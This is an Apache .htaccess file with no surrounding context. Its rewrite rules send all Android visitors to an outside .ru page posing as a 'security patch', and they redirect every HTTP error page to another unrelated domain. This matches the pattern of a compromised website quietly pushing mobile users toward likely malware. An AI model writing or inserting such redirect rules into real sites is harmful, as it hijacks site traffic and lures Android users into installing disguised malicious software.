RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} .*ndroid.*
RewriteRule ^(.*)$ http://official.androidsecuritybox.ru/securitypatch.php
ErrorDocument 400 http://unorxx.com
ErrorDocument 401 http://unorxx.com
ErrorDocument 403 http://unorxx.com
ErrorDocument 404 http://unorxx.com
ErrorDocument 500 http://unorxx.com